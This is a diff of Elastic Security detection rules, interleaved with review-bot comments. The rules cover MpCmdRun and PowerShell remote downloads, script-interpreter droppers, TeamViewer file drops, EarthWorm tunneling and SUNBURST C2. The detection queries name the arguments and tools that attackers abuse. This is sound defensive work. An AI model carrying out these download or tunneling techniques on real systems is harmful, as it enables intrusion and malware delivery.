 "Elastic",
@@ -46,5 +69,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json
index 59e4e59a88c32..8dcbab88b386b 100644
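Review bot: The rewritten `note` string on the `+` line still carries the duplicated word in "is used to to configure lockscreen/desktop image" and the comma splice that follows it; since the line is being replaced anyway, tidy the sentence to `The Desktopimgdownldr.exe utility is used to configure the lockscreen/desktop image and can be abused with the lockscreenurl argument to download remote files and tools; this rule looks for that behavior.` Moving the former `## Config` paragraph out of `note` into the new `setup` field is consistent with the other rules in this commit. The four `required_fields` entries match the fields the query references (event.type, process.name, process.pe.original_file_name, process.args), so nothing is missing there.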
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json
@@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows\nDefender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files,\nincluding malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO 
Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows\nDefender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files,\nincluding malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n",
 "references": [
 "https://twitter.com/mohammadaskar2/status/1301263551638761477",
 "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -47,5 +70,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 7
+ "version": 9
 }
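Review bot: The `query` (a context line in this hunk) matches only `event.type == "start"`, while the Desktopimgdownldr and RDP-tunneling rules touched by this same commit accept `event.type in ("start", "process_started")`; unless the narrower match is deliberate, aligning it would keep coverage consistent across these sibling rules on data sources that still emit the legacy value. The rewritten `note` also opens with "The `MpCmdRun.exe` is a command-line tool part of Windows Defender", which reads better as `MpCmdRun.exe is a command-line tool that is part of Windows Defender`. The four `required_fields` entries do match the fields the query references.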
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json
index 2fbd3dffc5c14..1d8d50da459f1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json
@@ -14,6 +14,53 @@ "name": "Remote File Download via PowerShell", "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it\navailable for use in various environments and creates an attractive way for attackers to execute code and perform\nactions. This rule correlates network and file events to detect downloads of executable and script files performed using\nPowerShell.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive 
analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert\nif the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and \n not user.domain : \"NT AUTHORITY\"]\n [file where process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and \n not file.name : \"__PSScriptPolicy*.ps1\"]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "dns.question.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.domain",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "33f306e8-417c-411b-965c-c2812d6d3f4d",
 "severity": "medium",
@@ -64,5 +111,5 @@
 }
 ],
 "type": "eql",
- "version": 5
+ "version": 6
 }
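Review bot: The `query` (a context line here) lets the network branch match `powershell.exe`, `pwsh.exe` and `powershell_ise.exe`, but the file branch matches only `process.name : "powershell.exe"`, so a sequence that starts with a `pwsh.exe` DNS lookup can never complete and those downloads go undetected. Unless that asymmetry is intentional, widen the file branch to `[file where process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and event.type == "creation" and ...`. The two `and \n` fragments in the query also carry trailing spaces before the newline, which are harmless but worth trimming if the query is edited. The nine `required_fields` entries match the fields the query references.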
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json
index d35d969ec4472..9b5fba990f44a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json
@@ -14,6 +14,53 @@ "name": "Remote File Download via Script Interpreter", "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the script file and the executable involved and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Manually analyze the script to determine if malicious capabilities are present.\n- Investigate whether the potential malware ran successfully, is active on the host, or was stopped by defenses.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False 
positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id\n [network where process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.direction",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f",
 "severity": "medium",
@@ -42,5 +89,5 @@
 }
 ],
 "type": "eql",
- "version": 5
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json
index 11eaab819b4ec..271e592d28ae0 100644
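Review bot: The loopback exclusion in the `query` (a context line here), `destination.ip != "127.0.0.1"`, drops only one address of the 127.0.0.0/8 block, so local-only connections to any other loopback address still start a sequence and can produce noise. If the intent is to exclude loopback traffic, `not cidrMatch(destination.ip, "127.0.0.0/8")` covers the whole block; since `network.type == "ipv4"` already filters out IPv6, `::1` needs no separate handling. The `destination.ip` entry in the new `required_fields` is correctly typed `ip` rather than `keyword`, and the remaining eight entries match the fields the query references.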
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json
@@ -15,6 +15,28 @@
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "http.request.body.content",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "22599847-5d13-48cb-8872-5796fee8692b",
 "severity": "high",
@@ -73,5 +95,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json
index e14d72cc0f03a..2ceb786ba066a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various\nsupport activities. It is also frequently used by attackers and scammers to deploy malware interactively and other\nmalicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this\naccess.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This 
mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct\nremote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various\nsupport activities. It is also frequently used by attackers and scammers to deploy malware interactively and other\nmalicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this\naccess.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the company relies on TeamViewer to conduct\nremote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json index e9e39f92954f3..09ea2483df21d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json 
@@ -17,6 +17,23 @@
 "license": "Elastic License v2",
 "name": "Telnet Port Activity",
 "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port:23\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "34fde489-94b0-4500-a76f-b8a157cf9269",
 "severity": "medium",
@@ -73,5 +90,5 @@
 "timeline_title": "Comprehensive Network Timeline",
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 12
+ "version": 13
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json
index f908579e6b55b..ca690efd7678c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json
@@ -11,14 +11,27 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Protocol Tunneling via EarthWorm",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n",
 "references": [
 "http://rootkiter.com/EarthWorm/",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -46,5 +59,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json
index 271cf74f36723..64bcfbe387415 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json
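Review bot: `"note": ""` leaves an empty investigation guide on the rule instead of dropping the key, now that the only content the note had has moved to the new `setup` field. If the rule schema treats `note` as optional, omitting the key avoids rendering an empty guide in the UI; if the empty string is deliberate (for example to clear the old note on rule upgrade), a sentence in the PR description explaining that would save the next reader the question. The same pattern appears in the browser-credentials, both Okta, and Azure hunks below, so whichever choice is made should be applied to all of them.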
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json
@@ -20,6 +20,33 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "5700cb81-df44-46aa-a5d7-337798f53eb8",
 "severity": "high",
@@ -65,5 +92,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 11
+ "version": 12
 }
